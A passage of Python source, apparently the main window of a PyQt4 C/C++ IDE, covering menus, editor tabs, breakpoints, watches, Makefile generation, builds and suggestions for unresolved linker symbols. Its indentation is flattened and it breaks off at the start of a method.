def loadTabs(self):
self.closeAllTabs()
ws=self.workspaceTree.settings()
opentabs=ws.value('opentabs','').toString()
opentabs=opentabs.split(',')
for path in opentabs:
self.openSourceFile(path)
curtab=ws.value('curtab','').toString()
if curtab:
self.setActiveSourceFile(curtab)
def setupMenu(self):
""" Creates the application main menu
The action handlers are also mapped from the toolbar icons
"""
bar=self.menuBar()
m=bar.addMenu('&File')
m.addAction(QtGui.QAction('&Initialize Workspace',self,triggered=self.initWorkspace))
m.addAction(QtGui.QAction('Open &Workspace',self,triggered=self.openWorkspace))
self.recents_menu=m.addMenu('&Recent Workspaces')
m.addAction(QtGui.QAction('&Save',self,shortcut='Ctrl+S',triggered=self.saveFile))
m.addAction(QtGui.QAction('Save &As',self,triggered=self.saveAsFile))
m.addAction(QtGui.QAction('&Close File',self,shortcut='Ctrl+F4',triggered=self.closeFile))
m.addAction(QtGui.QAction('E&xit',self,shortcut='Ctrl+Q',triggered=self.exitApp))
m=bar.addMenu('&Edit')
m.addAction(QtGui.QAction('&Copy',self,shortcut='Ctrl+C',triggered=self.onCopy))
m.addAction(QtGui.QAction('C&ut',self,shortcut='Ctrl+X',triggered=self.onCut))
m.addAction(QtGui.QAction('&Paste',self,shortcut='Ctrl+V',triggered=self.onPaste))
m.addSeparator()
m.addAction(QtGui.QAction('&Find/Replace',self,shortcut='Ctrl+F',triggered=self.onFindReplace))
m.addAction(QtGui.QAction('Find/Replace &Next',self,shortcut='F3',triggered=self.onFindNext))
m=bar.addMenu('&View')
panes=m.addMenu('Panes')
panes.addAction(QtGui.QAction('&Workspace',self,triggered=self.onViewPaneWorkspace))
panes.addAction(QtGui.QAction('&Output',self,triggered=self.onViewPaneOutput))
m.addAction(QtGui.QAction('&Next Tab',self,shortcut='Ctrl+F6',triggered=self.onViewNextTab))
m=bar.addMenu('&Build')
m.addAction(QtGui.QAction('&Build',self,shortcut='F7',triggered=self.build))
m.addAction(QtGui.QAction('&Clean',self,triggered=self.clean))
m.addAction(QtGui.QAction('&Rebuild',self,shortcut='Shift+F7',triggered=self.rebuild))
m.addAction(QtGui.QAction('&Settings',self,shortcut='Ctrl+F7',triggered=self.buildSettings))
m.addAction(QtGui.QAction('&Next Error',self,shortcut='F4',triggered=self.nextError))
m=bar.addMenu('&Debug')
m.addAction(QtGui.QAction('&Run',self,shortcut='Ctrl+F5',triggered=self.runProject))
m.addAction(QtGui.QAction('&Start/Continue Debugger',self,shortcut='F5',triggered=self.startDebug))
ma=m.addMenu('Actions')
ma.addAction(QtGui.QAction('&Step',self,shortcut='F11',triggered=self.actStep))
ma.addAction(QtGui.QAction('&Next',self,shortcut='F10',triggered=self.actNext))
ma.addAction(QtGui.QAction('Step &Out',self,shortcut='Shift+F11',triggered=self.actOut))
ma.addAction(QtGui.QAction('&Break',self,shortcut='Ctrl+C',triggered=self.actBreak))
ma.addAction(QtGui.QAction('Sto&p',self,shortcut='Shift+F5',triggered=self.actStop))
ma=m.addMenu('&Breakpoints')
ma.addAction(QtGui.QAction('&Clear',self,triggered=self.clearBreakpoints))
m=bar.addMenu('&Settings')
m.addAction(QtGui.QAction('&General',self,triggered=self.settingsGeneral))
m.addAction(QtGui.QAction('&Fonts',self,triggered=self.settingsFonts))
m.addAction(QtGui.QAction('&Editor',self,triggered=self.settingsEditor))
m.addAction(QtGui.QAction('&Templates',self,triggered=self.settingsTemplates))
m.addAction(QtGui.QAction('&Plugins',self,triggered=self.settingsPlugins))
m=bar.addMenu('&Tools')
pm=m.addMenu('&Plugins')
self.plugins.addToMenu(pm)
def onViewPaneWorkspace(self):
self.paneWorkspace.show()
def onViewPaneOutput(self):
self.paneOutput.show()
def onViewNextTab(self):
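# cycle the focused tab in most-recently-used order by rotating self.tabOrder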
count=self.central.count()
if count>0:
if len(self.tabOrder)!=count:
self.tabOrder=range(0,self.central.count())
if self.central.currentIndex() == self.tabOrder[0]:
self.tabOrder=self.tabOrder[1:]+self.tabOrder[:1]
self.central.setCurrentIndex(self.tabOrder[0])
def setupContextMenuItems(self):
self.contextMenuItems={
'all':[
QtGui.QAction('Toggle Breakpoint',self,triggered=self.contextToggleBreakpoint)
],
'files':[
QtGui.QAction('Open Header',self,triggered=self.contextOpenHeader)
],
'breakpoints':[
QtGui.QAction('Edit Breakpoint',self,triggered=self.contextEditBreakpoint),
QtGui.QAction('Dis/Enable Breakpoint',self,triggered=self.contextAbleBreakpoint)
],
'symbols':[
QtGui.QAction('Goto Definition',self,triggered=self.contextGotoDefinition)
]
}
def insertContextMenuItems(self,editor,menu):
first=None
acts=menu.actions()
if len(acts)>0:
first=acts[0]
actions=list(self.contextMenuItems.get('all'))
path=editor.path
line=editor.contextMenuLine
word=editor.contextMenuWord
self.context=(path,line,word)
if len(word)>0:
actions.extend(self.contextMenuItems.get('symbols'))
if self.breakpoints.hasBreakpoint(path,line):
actions.extend(self.contextMenuItems.get('breakpoints'))
if self.workspaceTree.exists(editor.contextFilename):
actions.extend(self.contextMenuItems.get('files'))
menu.insertActions(first,actions)
menu.insertSeparator(first)
def contextGotoDefinition(self):
src=os.path.join(self.workspaceTree.root,'src')
intr=os.path.join(self.workspaceTree.root,'.intr')
srcpath=self.context[0]
objpath=''
if srcpath.startswith(src) and is_src_ext(srcpath):
rel=srcpath[len(src):]
rel=os.path.splitext(rel[1:])[0]+'.o'  # strip the leading path separator and replace the source extension with .o
objpath=os.path.join(intr,rel)
(dir,name)=os.path.split(objpath)
objpath=os.path.join(dir,'Debug',name)
if srcpath.startswith(self.workspaceTree.root) and srcpath.endswith('.h'):
dir=self.workspaceTree.mainPath()
mkPath=os.path.join(dir,'Makefile')
objpath=utils.objForHeader(mkPath,srcpath)
if len(objpath)>0:
try:
s=dwarf.DwarfSymbols(objpath)
(path,line)=s.find(self.context[2])
if len(path)>0:
self.goToSource(path,line,1)
except IOError:
utils.message('Project must first be compiled in Debug')
def contextToggleBreakpoint(self):
e=self.central.currentWidget()
self.breakpoints.toggleBreakpoint(e)
e.update()
def contextEditBreakpoint(self):
e=self.central.currentWidget()
path=e.path
line=e.contextMenuLine
bp=self.breakpoints.getBreakpoint(path,line)
if bp:
d=BreakpointDialog()
d.condition.setText(bp.condition())
utils.setCheckbox(d.enabled,bp.isEnabled())
if d.exec_():
bp.setCondition(d.condition.text())
bp.able(utils.getCheckbox(d.enabled))
self.breakpoints.update()
e.update()
def contextAbleBreakpoint(self):
e=self.central.currentWidget()
path=e.path
line=e.contextMenuLine
bp=self.breakpoints.getBreakpoint(path,line)
if bp:
if bp.isEnabled():
bp.disable()
else:
bp.enable()
self.breakpoints.update()
e.update()
def contextOpenHeader(self):
e=self.central.currentWidget()
filename=self.workspaceTree.exists(e.contextFilename)
if filename:
self.workspaceTree.openFile(filename)
def markToggleBreakpoint(self,line):
e=self.central.currentWidget()
#path=e.path
self.breakpoints.toggleBreakpoint(e)
e.update()
def createPluginCuror(self):
from pcursor import PluginCursor
e=self.central.currentWidget()
if e:
return PluginCursor(e.textCursor())
return None
def setupToolbar(self,rootDir):
""" Creates the application main toolbar """
tb=self.addToolBar('Actions')
tb.setObjectName("Toolbar")
tb.addAction(utils.loadIcon('gear'),'Generate Makefiles').triggered.connect(self.generate)
self.configCombo=self.createConfigCombo(tb)
tb.addWidget(self.configCombo)
tb.addAction(utils.loadIcon('step.png'),'Step').triggered.connect(self.actStep)
tb.addAction(utils.loadIcon('next.png'),'Next').triggered.connect(self.actNext)
tb.addAction(utils.loadIcon('out.png'),'Out').triggered.connect(self.actOut)
tb.addAction(utils.loadIcon('cont.png'),'Continue').triggered.connect(self.actCont)
tb.addAction(utils.loadIcon('break.png'),'Break').triggered.connect(self.actBreak)
tb.addAction(utils.loadIcon('stop.png'),'Stop').triggered.connect(self.actStop)
self.createTemplatesCombo(tb)
tb.addWidget(self.tmplCombo)
def exitApp(self):
self.close()
def nextError(self):
e=self.outputEdit.getNextError()
if e:
self.showStatus(e[3])
self.goToSource(e[0],e[1],e[2],'#ff8080')
self.outputEdit.highlightLine(e[4])
def onCopy(self):
(e,p)=self.currentEditor()
if e:
e.copy()
def onCut(self):
(e,p)=self.currentEditor()
if e:
e.cut()
def onPaste(self):
(e,p)=self.currentEditor()
if e:
e.paste()
def onFindReplace(self):
(e,p)=self.currentEditor()
if e:
from finddlg import FindDialog
d=FindDialog(self)
c=e.textCursor()
if c.hasSelection():
d.setFindText(c.selectedText())
if d.exec_():
self.findDetails=d.details
self.onFindNext()
def onFindNext(self):
(e,p)=self.currentEditor()
if e and self.findDetails:
flags=QtGui.QTextDocument.FindFlags()
if not self.findDetails.get('find_case'):
flags = flags | QtGui.QTextDocument.FindCaseSensitively
if self.findDetails.get('find_words'):
flags = flags | QtGui.QTextDocument.FindWholeWords
if self.findDetails.get('find_back'):
flags = flags | QtGui.QTextDocument.FindBackward
text=self.findDetails.get('find_text')
replaceText=self.findDetails.get('find_replace_text')
replace=self.findDetails.get('find_replace')
all=self.findDetails.get('find_all')
if all and replace:
while e.find(text,flags):
e.textCursor().insertText(replaceText)
elif e.find(text,flags):
if replace:
e.textCursor().insertText(replaceText)
def settingsTemplates(self):
""" Show the code templates editing dialog """
from settings import TemplatesDialog
d=TemplatesDialog()
if d.exec_():
d.save()
self.updateTemplates()
def settingsPlugins(self):
""" Show the python plugins settings dialog """
from plugins import PluginsDialog
d=PluginsDialog()
if d.exec_():
d.save()
def settingsGeneral(self):
""" Show the general settings """
from settings import GeneralSettingsDialog
d=GeneralSettingsDialog()
if d.exec_():
d.save()
self.updateGeneralSettings()
def settingsEditor(self):
""" Show the editor settings """
from settings import EditorSettingsDialog
d=EditorSettingsDialog()
if d.exec_():
d.save()
self.updateEditorsSettings()
def settingsFonts(self):
""" Edit the font settings for the code window and various panes """
from settings import FontSettingsDialog
d=FontSettingsDialog()
if d.exec_():
self.setAllFonts()
def loadFont(self,name,target):
""" Load previously saved font settings """
settings=QtCore.QSettings()
if settings.contains(name):
fb=settings.value(name).toByteArray()
buf=QtCore.QBuffer(fb)
buf.open(QtCore.QIODevice.ReadOnly)
font=QtGui.QFont()
QtCore.QDataStream(fb) >> font
target.setFont(font)
else:
target.setFont(QtGui.QFont('Monospace',14))
def setAllFonts(self):
""" Apply fonts to the various sub-windows """
for e in self.editors:
self.loadFont('codefont',self.editors.get(e))
#self.loadFont('watchesfont',self.watchesTree)
#self.loadFont('watchesfont',self.stackList)
self.loadFont('watchesfont',self.outputEdit)
self.loadFont('sourcesfont',self.workspaceTree)
def updateGeneralSettings(self):
""" Apply general settings """
s=QtCore.QSettings()
sortFiles=s.value('sortFiles',True).toBool()
self.workspaceTree.setSorting(sortFiles)
def updateEditorsSettings(self):
""" Apply editor settings to all open tabs """
s=QtCore.QSettings()
indent=(s.value('indent',2).toInt())[0]
clang=s.value('clangCompletion',True).toBool()
for e in self.editors:
self.editors.get(e).indentWidth=indent
self.editors.get(e).clangCompletion=clang
def updateTemplates(self):
self.tmplCombo.clear()
self.tmplCombo.addItem("= Templates =")
d=QtCore.QSettings().value('tmplDir','').toString()
if d:
templates=os.listdir(d)
templates=[os.path.splitext(t)[0] for t in templates if t.endswith('.template')]
for t in templates:
self.tmplCombo.addItem(t)
def showStatus(self,status):
self.statusBar().showMessage(status)
def findUndefinedReferences(self,output):
"""
Search the linker output to find undefined reference
errors, and collect the missing symbol names
"""
undefined=set()
base='undefined reference to '
if output:
for line in output:
p=line.find(base)
if p>0:
name=line[(p+len(base)):]
if name.startswith('symbol '):
name=name[8:]
else:
name=name[1:]
p=name.find('(')
if p>0:
name=name[0:p]
else:
name=name[0:len(name)-1]
p=name.find('@')
if p>0:
name=name[0:p]
undefined.add(name)
return undefined
def toggleAdded(self,item):
if item.checkState():
self.added.add(item.text())
else:
self.added.remove(item.text())
def attemptUndefResolution(self,undefs):
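# suggest libraries that export the undefined symbols: count matches per library and let the user tick which ones to add to the project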
if not self.symbolScan:
return
from system import getLibrarySymbols, getWorkspaceSymbols
suggested={}
syms=getLibrarySymbols()
wsSyms=getWorkspaceSymbols()
for sym in undefs:
words=sym.split(':')
words=[w for w in words if w]
words.append(sym)
for word in words:
if word in syms:
s=syms.get(word)
for l in s:
if not l in suggested:
suggested[l]=1
else:
n=suggested.get(l)+1
suggested[l]=n
if word in wsSyms:
s=wsSyms.get(word)
for l in s:
if not l in suggested:
suggested[l]=1
else:
n=suggested.get(l)+1
suggested[l]=n
self.added=set()
if len(suggested)>0:
d=uis.loadDialog('libsuggest')
model = QtGui.QStandardItemModel(d.libsList)
for s in suggested:
item=QtGui.QStandardItem(s)
item.setCheckable(True)
model.appendRow(item)
d.libsList.setModel(model)
model.itemChanged.connect(lambda item : self.toggleAdded(item))
if d.exec_():
self.workspaceTree.addLibrariesToProject(self.added)
def buildSettings(self,path=''):
from buildsettings import BuildSettingsDialog
if not path:
path=self.workspaceTree.mainPath()
if not path:
path=self.workspaceTree.root
d=BuildSettingsDialog(self,path)
d.exec_()
self.generateQueue.add(path)
def checkBuildOutput(self):
if self.buildProcess:
self.processBuildOutput(self.buildProcess.text)
self.buildProcess=None
def pollAsync(self):
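# poll the asynchronous build process; report success or failure in the output pane when it finishes and stop the poll timer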
rcs=utils.pollAsync()
if len(rcs)>0:
if rcs[0]==0:
utils.appendColorLine(self.outputEdit,"Success...",'#008020')
else:
utils.appendColorLine(self.outputEdit,"= Failed ({}) =".format(rcs[0]),'#ff0000')
self.checkBuildOutput()
self.asyncPollTimer.stop()
self.showStatus("Done")
def execute(self,path,cmd,*args):
if utils.pendingAsync():
self.showStatus('Busy')
return None
self.outputEdit.clearAll()
p=utils.execute(self.outputEdit,path,cmd,*args)
if not self.asyncPollTimer.isActive():
self.asyncPollTimer.start(10)
return p
def buildSpecific(self,path):
self.saveAll()
self.autoGenerate()
if len(path)>0:
self.showStatus("Building "+os.path.basename(path))
s=QtCore.QSettings()
if s.value('parallel_make',False).toBool():
self.buildProcess=self.execute(path,'/usr/bin/make','-j','3',self.config)
else:
self.buildProcess=self.execute(path,'/usr/bin/make',self.config)
def processBuildOutput(self,output):
undefs=self.findUndefinedReferences(output)
if len(undefs)>0:
self.attemptUndefResolution(undefs)
def build(self):
self.buildSpecific(self.workspaceTree.mainPath())
def cleanSpecific(self,path):
if len(path)>0:
self.execute(path,'/usr/bin/make','clean_{}'.format(self.config))
def clean(self):
self.cleanSpecific(self.workspaceTree.mainPath())
def rebuildSpecific(self,path):
if len(path)>0:
cfg=self.config
self.showStatus("Rebuilding "+os.path.basename(path))
self.buildProcess=self.execute(path,'/usr/bin/make','clean_'+cfg,cfg)
def rebuild(self):
self.rebuildSpecific(self.workspaceTree.mainPath())
def autoGenerateRun(self):
for path in self.generateQueue:
genmake.generateDirectory(self.workspaceTree.root,path)
self.generateQueue.clear()
self.showStatus('Ready')
def autoGenerate(self):
if len(self.generateQueue)>0:
self.showStatus('Generating Makefiles')
self.timerCall=self.autoGenerateRun
else:
if genmake.genThreadDone():
self.showStatus("Makefile Generate Done")
def waitForScanner(self):
if self.symbolScan:
import system
import time
while not system.isScannerDone():
time.sleep(1)
def timer1000(self):
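# once-per-second housekeeping: refresh breakpoint line numbers, run any deferred call, regenerate queued Makefiles and poll the library symbol scanner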
e=self.central.currentWidget()
if e:
updates=self.breakpoints.updateLineNumbers(e.path)
for path in updates:
e=self.editors.get(path)
if e:
e.update()
if self.timerCall:
f=self.timerCall
self.timerCall=None
f()
self.autoGenerate()
#if self.statusBar().currentMessage() == MainWindow.LIBRARY_SCAN:
if self.symbolScan:
import system
if system.isScannerDone():
#if system.scanq and not system.scanq.empty():
if self.statusBar().currentMessage() == MainWindow.LIBRARY_SCAN:
self.showStatus('Ready')
system.getLibrarySymbols()
def timer5000(self):
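# every 5 seconds: color workspace files by their SCM (git) status and offer to reload files that changed on disk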
import scm
res=scm.scan(self.workspaceTree.root)
if res:
new_scm_mods=[]
for (name,status) in res:
path=os.path.join(self.workspaceTree.root,name)
if path in self.workspaceTree.fileItems:
item=self.workspaceTree.fileItems.get(path)
if status=='Modified':
item.setForeground(0,QtGui.QBrush(QtGui.QColor(255,0,0)))
elif status=='Staged':
item.setForeground(0,QtGui.QBrush(QtGui.QColor(0,255,0)))
new_scm_mods.append(item)
for item in self.scm_mods:
if not item in new_scm_mods:
item.setForeground(0,QtGui.QBrush(QtGui.QColor(0,0,0)))
self.scm_mods=new_scm_mods
for path in self.editors:
last=self.file_times.get(path)
cur=os.path.getmtime(path)
if cur!=last:
self.file_times[path]=cur
res=QtGui.QMessageBox.question(self,'File changed','Reload {}'.format(path),QtGui.QMessageBox.Yes,QtGui.QMessageBox.No)
if res==QtGui.QMessageBox.Yes:
text=''.join(open(path,'r').readlines())
self.editors.get(path).text=text
def generateAllInThread(self):
genmake.generateTree(self.workspaceTree.root,False)
def generateAll(self):
genmake.generateTree(self.workspaceTree.root,True)
def generate(self):
mb=QtGui.QMessageBox()
mb.setText("Generate make files")
mb.setInformativeText("Overwrite all make files?")
mb.setStandardButtons(QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
mb.setDefaultButton(QtGui.QMessageBox.Yes)
rc=mb.exec_()
if rc==QtGui.QMessageBox.Yes:
self.generateAll()
utils.message("Done")
def createHelloWorldProject(self,dir):
try:
os.makedirs(dir)
except OSError:
pass
mainpath=os.path.join(dir,'main.cpp')
f=open(mainpath,"w")
f.write('#include <iostream>\n\n\nint main(int argc, char* argv[])\n')
f.write('{\n std::cout << "Hello World" << std::endl;\n return 0;\n}\n')
f.close()
self.workspaceTree.update()
genmake.generateDirectory(self.workspaceTree.root,dir)
self.workspaceTree.setMainPath(dir)
def initWorkspace(self):
d=QtGui.QFileDialog()
d.setFileMode(QtGui.QFileDialog.Directory)
d.setOption(QtGui.QFileDialog.ShowDirsOnly)
if d.exec_():
ws=(d.selectedFiles())[0]
os.makedirs(os.path.join(ws,'include'))
dir=os.path.join(ws,'src','hello')
self.workspaceTree.setWorkspacePath(ws)
self.createHelloWorldProject(dir)
self.workspaceTree.saveSettings()
self.generateAll()
def updateRecents(self):
ws=self.workspaceTree.root
if ws in self.recent_ws:
del self.recent_ws[self.recent_ws.index(ws)]
self.recent_ws.insert(0,ws)
while len(self.recent_ws)>4:
del self.recent_ws[-1]
s=QtCore.QSettings()
s.setValue('recent_ws',':'.join(self.recent_ws))
s.sync()
self.recents_menu.clear()
handlers=[partial(self.openRecent,w) for w in self.recent_ws]
for ws,h in zip(self.recent_ws,handlers):
self.recents_menu.addAction(QtGui.QAction(ws,self,triggered=h))
def openRecent(self,ws):
self.workspaceTree.saveTabs(self.central)
self.closeAllTabs()
self.workspaceTree.setWorkspacePath(ws)
#self.generateAll()
self.loadTabs()
self.waitForScanner()
import symbolscanner
symbolscanner.setWorkspacePath(ws)
self.updateRecents()
def openWorkspace(self):
d=QtGui.QFileDialog()
d.setFileMode(QtGui.QFileDialog.Directory)
d.setOption(QtGui.QFileDialog.ShowDirsOnly)
if d.exec_():
ws=(d.selectedFiles())[0]
self.openRecent(ws)
def saveTabFile(self,index):
n=self.central.tabBar().count()
if index>=0 and index<n:
path=self.central.tabToolTip(index)
editor=self.editors.get(path)
if editor:
doc=editor.document()
if doc.isModified():
f=open(path,'w')
if not f:
utils.errorMessage('Cannot write file: {}'.format(path))
return
f.write(doc.toPlainText())
f.close()
doc.setModified(False)
self.file_times[path]=os.path.getmtime(path)
#dir=os.path.dirname(path)
#self.generateQueue.add(dir)
if self.symbolScan:
from system import getLibrarySymbols
getLibrarySymbols()
from symbolscanner import rescanOnFileSave
rescanOnFileSave(path)
def saveFile(self):
n=self.central.tabBar().count()
if n>0:
self.saveTabFile(self.central.currentIndex())
def saveAll(self):
n=self.central.tabBar().count()
for i in xrange(0,n):
self.saveTabFile(i)
def saveAsFile(self):
pass
def closeAllTabs(self):
while self.central.count()>0:
if not self.closeTab(0):
return False
return True
def tabChanged(self,index):
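# rotate self.tabOrder so the entry for the newly selected tab comes first;
# the relative (cyclic) order of the remaining entries is preserved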
for i in xrange(0,len(self.tabOrder)):
if self.tabOrder[i]==index:
self.tabOrder=self.tabOrder[i:]+self.tabOrder[:i]
break
def closeTab(self,index):
path=self.central.tabToolTip(index)
editor=self.editors.get(path)
if editor:
doc=editor.document()
if doc.isModified():
mb = QtGui.QMessageBox()
mb.setText("{} has been modified.".format(os.path.basename(path)))
mb.setInformativeText("Do you want to save your changes?")
mb.setStandardButtons(QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard | QtGui.QMessageBox.Cancel)
mb.setDefaultButton(QtGui.QMessageBox.Save)
rc = mb.exec_()
if rc == QtGui.QMessageBox.Save:
f=open(path,'w')
if not f:
utils.errorMessage('Cannot write file: {}'.format(path))
return False
f.write(doc.toPlainText())
f.close()
elif rc == QtGui.QMessageBox.Cancel:
return False
del self.editors[path]
del self.file_times[path]
self.central.removeTab(index)
return True
def closeFile(self):
n=self.central.tabBar().count()
if n>0:
index=self.central.currentIndex()
return self.closeTab(index)
return False
def currentEditor(self):
if self.central.count()>0:
cur=self.central.currentIndex()
path=self.central.tabToolTip(cur)
if path in self.editors:
return (self.editors.get(path),path)
return (None,None)
def templateSelected(self,index):
(editor,path)=self.currentEditor()
if index>0 and editor:
template=self.tmplCombo.itemText(index)
d=QtCore.QSettings().value('tmplDir','').toString()
if d:
tpath=os.path.join(d,template+".template")
try:
f=open(tpath,'r')
code=f.read()
if code:
cursor=editor.textCursor()
props=Properties()
props.assign('PATH',path)
base=os.path.basename(path)
props.assign('FILENAME',base)
p=base.find('.')
if (p>0):
props.assign('FILEBASE',base[0:p])
props.assign('SELECTION',cursor.selectedText())
cursor.removeSelectedText()
import templates
text=templates.generateCode(code,props)
cursor.insertText(text)
except IOError:
utils.errorMessage("Cannot read file: {}".format(path))
self.tmplCombo.setCurrentIndex(0)
def showWorkspacePane(self):
""" Creates a docking pane that shows a list of source files """
self.paneWorkspace=QtGui.QDockWidget("Workspace",self)
self.paneWorkspace.setObjectName("Workspace")
self.paneWorkspace.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)
self.workspaceTree=WorkSpace(self.paneWorkspace,self)
self.workspaceTree.depsChanged.connect(lambda path: self.generateQueue.add(path))
self.paneWorkspace.setWidget(self.workspaceTree)
self.addDockWidget(QtCore.Qt.LeftDockWidgetArea,self.paneWorkspace)
self.updateWorkspace()
self.workspaceTree.doubleClicked.connect(self.docDoubleClicked)
self.showStatus(MainWindow.LIBRARY_SCAN)
if self.symbolScan:
from system import startSymbolScan
startSymbolScan(self.workspaceTree.root)
else:
from system import disableSymbolScan
disableSymbolScan()
self.updateRecents()
def updateWorkspace(self):
self.workspaceTree.update()
def setActiveSourceFile(self,path):
if path in self.editors:
editor=self.editors.get(path)
n=self.central.tabBar().count()
for i in xrange(0,n):
if self.central.widget(i) == editor:
self.central.tabBar().setCurrentIndex(i)
return True
return False
def fixPath(self,path):
if path.startswith(self.rootDir):
path=os.path.relpath(path,self.rootDir)
return path
'''
Makes the given path the active source file in the editor.
If the file is already open, it is made active.
If not, it is opened and made active.
Returns True if the file is found and opened.
'''
def openSourceFile(self,path):
path=self.fixPath(path)
if self.setActiveSourceFile(path):
return True
else:
try:
f=open(path,"r")
if not f:
return False
lines=f.readlines()
if lines:
firstLine=lines[0]
s=QtCore.QSettings()
editor=qutepart.Qutepart()
editor.setPath(path)
editor.detectSyntax(sourceFilePath=path, firstLine=firstLine)
editor.lineLengthEdge = 1024
editor.drawIncorrectIndentation = True
editor.drawAnyWhitespace = False
editor.indentUseTabs = False
editor.indentWidth = (s.value('indent',2).toInt())[0]
editor.text="".join(lines)
editor.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
editor.setWorkspace(self.workspaceTree)
editor.setMainWindow(self)
index=self.central.addTab(editor,os.path.basename(path))
self.central.setTabToolTip(index,path)
self.editors[path]=editor
self.file_times[path]=os.path.getmtime(path)
self.loadFont('codefont',editor)
self.central.tabBar().setCurrentIndex(index)
bps=self.breakpoints.pathBreakpoints(path)
editor.bpMarks=bps
editor._markArea.blockDoubleClicked.connect(self.markToggleBreakpoint)
return True
except IOError:
return False
return False
def docDoubleClicked(self,index):
item=self.workspaceTree.currentItem()
path=item.data(0,FileRole).toString()
if len(path)>0:
self.openSourceFile(path)
if path in self.editors:
self.editors.get(path).setFocus(QtCore.Qt.MouseFocusReason)
def goToSource(self,path,row,col,color=''):
"""
Given a file path, and a position within, open a tab
or switch to an already open tab, and scroll to that
position. Usually useful to find references or
compiler error positions
"""
path=self.fixPath(path)
if self.openSourceFile(path):
editor=self.editors.get(path)
if editor:
self.setActiveSourceFile(path)
c=editor.textCursor()
c.movePosition(QtGui.QTextCursor.Start)
c.movePosition(QtGui.QTextCursor.Down,n=row-1)
c.movePosition(QtGui.QTextCursor.Right,n=col-1)
editor.setTextCursor(c)
editor.ensureCursorVisible()
if len(color)>0:
editor.colorLine(row,color)
def showCallStackPane(self):
self.paneStack=QtGui.QDockWidget("Call Stack",self)
self.paneStack.setObjectName("CallStack")
self.paneStack.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.stackList=QtGui.QListWidget(self.paneStack)
self.paneStack.setWidget(self.stackList)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneStack)
self.loadFont('watchesfont',self.stackList)
self.stackList.itemDoubleClicked.connect(self.stackItemDoubleClicked)
def showLocalsPane(self):
self.paneLocals=QtGui.QDockWidget("Locals",self)
self.paneLocals.setObjectName("Locals")
self.paneLocals.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.localsTree=WatchesTree(self.paneLocals)
self.localsTree.setColumnCount(2)
self.localsTree.setHeaderLabels(['Name','Value'])
self.paneLocals.setWidget(self.localsTree)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneLocals)
self.loadFont('watchesfont',self.localsTree)
def showWatchesPane(self):
self.paneWatches=QtGui.QDockWidget("Watches",self)
self.paneWatches.setObjectName("Watches")
self.paneWatches.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.watchesTree=WatchesTree(self.paneWatches)
self.watchesTree.setColumnCount(2)
self.watchesTree.setHeaderLabels(['Name','Value'])
self.paneWatches.setWidget(self.watchesTree)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneWatches)
self.loadFont('watchesfont',self.watchesTree)
self.watchesTree.addTopLevelItem(QtGui.QTreeWidgetItem(['* Double-Click for new watch']))
self.watchesTree.resizeColumnToContents(0)
self.watchesTree.itemDoubleClicked.connect(lambda item,column : self.watchDoubleClicked(item,column))
def showOutputPane(self):
self.paneOutput=QtGui.QDockWidget("Output",self)
self.paneOutput.setObjectName("Output")
self.paneOutput.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.outputEdit=output.OutputWidget(self.paneOutput,self)
self.outputEdit.setReadOnly(True)
self.paneOutput.setWidget(self.outputEdit)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneOutput)
def stackItemDoubleClicked(self,item):
pat=r'at (.+):(\d+)'
m=re.search(pat,item.text())
if m:
g=m.groups()
path=g[0]
line=int(g[1])
self.goToSource(path,line,1)
else:
row=self.stackList.row(item)
if row<(self.stackList.count()-1):
self.stackItemDoubleClicked(self.stackList.item(row+1))
def watchDoubleClicked(self,item,column):
""" Edits existing watches, or adds a new watch """
changed=False
index=self.watchesTree.indexOfTopLevelItem(item)
if item.text(column)=='* Double-Click for new watch':
res=QtGui.QInputDialog.getText(self,'New Watch','Expression')
expr=res[0]
if len(expr)>0 and res[1]:
self.watchesTree.insertTopLevelItem(index,QtGui.QTreeWidgetItem([expr]))
changed=True
self.updateWatches()
else:
watch=item.text(0)
res=QtGui.QInputDialog.getText(self,"Edit Watch",'Expression',text=watch)
watch=res[0]
if res[1]:
changed=True
if len(watch)>0:
item.setText(0,watch)
self.updateWatches()
else:
self.watchesTree.takeTopLevelItem(index)
if changed:
self.saveWatches()
def createConfigCombo(self,parent):
configCombo=QtGui.QComboBox(parent)
configCombo.addItem("Debug")
configCombo.addItem("Release")
configCombo.currentIndexChanged.connect(self.configChanged)
return configCombo
def createTemplatesCombo(self,parent):
self.tmplCombo=QtGui.QComboBox(parent)
self.tmplCombo.currentIndexChanged.connect(self.templateSelected)
self.updateTemplates()
def configChanged(self,index):
configs=['Debug','Release']
self.config=configs[index]
s=QtCore.QSettings()
s.setValue("config",self.config)
s.sync()
self.workspaceTree.setConfig(self.config)
def addOutputText(self,added):
""" Append the new text captured
Text is appended to the end of existing text and the widget
is scrolled to show the end
"""
text=self.outputEdit.toPlainText()
self.outputEdit.setPlainText(text+added)
c=self.outputEdit.textCursor()
c.movePosition(QtGui.QTextCursor.End)
self.outputEdit.setTextCursor(c)
self.outputEdit.ensureCursorVisible()
def tempScriptPath(self):
"""
Generate a temporary script name. Used for running programs
with an additional wait for key at the end.
"""
from time import time
t=int(time()*10)
return '/tmp/coide_{}.sh'.format(t)
def removeTempScripts(self):
"""
Remove all temporary script files. Called before program
exit
"""
files=os.listdir('/tmp')
files=[f for f in files if f.startswith('coide_')]
for f in files:
os.remove('/tmp/{}'.format(f))
def runProject(self):
if not utils.checkFor('xterm'):
utils.message("xterm not installed")
return
path=self.tempScriptPath()
f=open(path,'w')
dir=self.workspaceTree.getDebugDirectory()
cmd=self.workspaceTree.getExecutablePath()
params=self.workspaceTree.getDebugParams()
if len(params)>0:
cmd=cmd+" "+params
f.write('#!/bin/sh\ncd {}\n{}\nread -r -p "Press any key..." key\n'.format(dir,cmd))
f.close()
os.chmod(path,stat.S_IRUSR|stat.S_IWUSR|stat.S_IXUSR)
utils.run('/tmp','xterm','-fn','10x20','-e',path)
def getCurrentFile(self):
if self.central.count()==0:
return ''
return self.central.tabToolTip(self.central.currentIndex())
def getCurrentEditor(self):
